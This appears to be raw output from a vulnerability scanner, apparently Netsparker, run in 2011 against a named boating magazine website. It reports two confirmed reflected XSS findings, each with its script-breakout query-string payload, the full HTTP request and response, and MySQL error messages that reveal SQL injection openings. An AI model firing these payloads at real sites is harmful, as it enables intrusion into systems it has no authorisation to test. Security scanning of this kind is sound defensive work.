href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=f_technical&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=300px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=f_in_depth&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=300px&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <link rel="stylesheet" href="http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php?modid=f_destination&amp;news_content_header_pos=1&amp;news_content_image_pos=1&amp;img_height=0&amp;img_width=0&amp;news_content_info_pos=1&amp;news_content_readmore_pos=1&amp;news_content_text_pos=1" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script> <script type="text/javascript" src="http://www.soundingsonline.com/modules/mod_news_show_gk3/scripts/engine_compressed.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_home c_home m_features"><!--
Type of page: frontpage<br />Section: , s_home<br />Category: , c_home<br />Menu: 67, m_features-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"&g..
- /component/content/article/272312/

/component/content/article/272312/ CONFIRMED

http://www.soundingsonline.com/component/content/article/272312/?'%22--%3E%3C/style%3E%3C/script%3E%..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0023AF)</script>

Request

GET /component/content/article/272312/?'"--></style></script><script>netsparker(0x0023AF)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/component/content/article/272312/272312
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023AF)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023AF)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/component/content/article/272312/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Print magazine January 2011
emissions
Mark Hayhoe
Campion Marine
" /> <meta name="title" content="In tune with nature" /> <meta name="author" content="Dieter Loibner" /> <meta name="description" content="Mark Hayhoe feels at peace producing fewer emissions courtesy of his revolutionary Campion Allante 645." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>In tune with nature</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_features c_type_of_boat m_uncategorized"><!--
Type of page: article<br />Section: 5, s_features<br />Category: 43, c_type_of_boat<br />Menu: , m_uncategorized-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/more/digital-publications"><span>Digital Publications</span></a></li><li class="item104"><a href="/archives"><span>Archives</span></a></li><li class="item232"><a href="http://www.barkerstores..
- /subscription-services/subscribe-to-e-newsletter

/subscription-services/subscribe-to-e-newsletter CONFIRMED

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter?'%22--%3E%3C/style%3E..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0023B0)</script>

Request

GET /subscription-services/subscribe-to-e-newsletter?'"--></style></script><script>netsparker(0x0023B0)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023B0)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0023B0)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="title" content="Subscribe to Dispatches E-Newsletter" /> <meta name="author" content="Jason Johnson" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Subscribe to Dispatches E-Newsletter</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_sub_services c_uncategorized m_uncategorized"><!--
Type of page: article<br />Section: 15, s_sub_services<br />Category: 172, c_uncategorized<br />Menu: 202, m_uncategorized-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
